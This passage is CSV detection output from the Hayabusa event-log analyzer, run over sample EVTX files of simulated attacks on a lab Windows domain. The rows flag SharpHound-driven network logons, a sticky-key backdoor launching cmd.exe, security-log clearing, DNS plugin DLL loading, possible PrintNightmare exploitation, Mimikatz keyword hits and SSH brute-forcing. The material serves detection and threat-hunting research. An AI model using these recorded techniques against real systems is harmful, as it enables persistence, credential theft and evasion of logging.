0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62167 : LogonID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62170 : LogonID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62182 : LogonID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62175 : LogonID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62178 : LogonID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62179 : LogonID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62180 : LogonID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62184 : LogonID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62168 : LogonID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 
17:58:38.689 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62172 : LogonID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62183 : LogonID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62187 : LogonID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62186 : LogonID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62189 : LogonID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62193 : LogonID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62192 : LogonID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62191 : LogonID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62195 : LogonID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62196 : LogonID: 
0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62197 : LogonID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62198 : LogonID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62199 : LogonID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62200 : LogonID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - 
Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62211 : LogonID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62209 : LogonID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62219 : LogonID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62222 : LogonID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62223 : LogonID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx 
-2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62210 : LogonID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62208 : LogonID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62218 : LogonID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62216 : LogonID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62217 : LogonID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups 
Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62220 : LogonID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62221 : LogonID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62224 : LogonID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62234 : LogonID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62235 : LogonID: 
0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 62236 : LogonID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\windows\system32\cmd.exe sethc.exe 211 : Path: C:\Windows\System32\cmd.exe : User: OFFSEC\admmig : Parent Command: winlogon.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/process_creation_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx -2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL 
serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/other/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx -2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: sshd_5848 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_5848 : Workstation: - : IP Address: - : Port: - : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: sshd_5848 : LogonID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:52.315 +09:00,-,-,medium,User Guessing Attempt,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_UserGuessingDetect.yml,- -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,informational,NTLM Logon to Local Account,User: NOUSER : Workstation FS01 : Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,informational,Logon Failure - Username does not exist,User: NOUSER : Type: 8 : Workstation: FS01 : IP Address: - : SubStatus: 0xc0000064 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with non existing user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target 
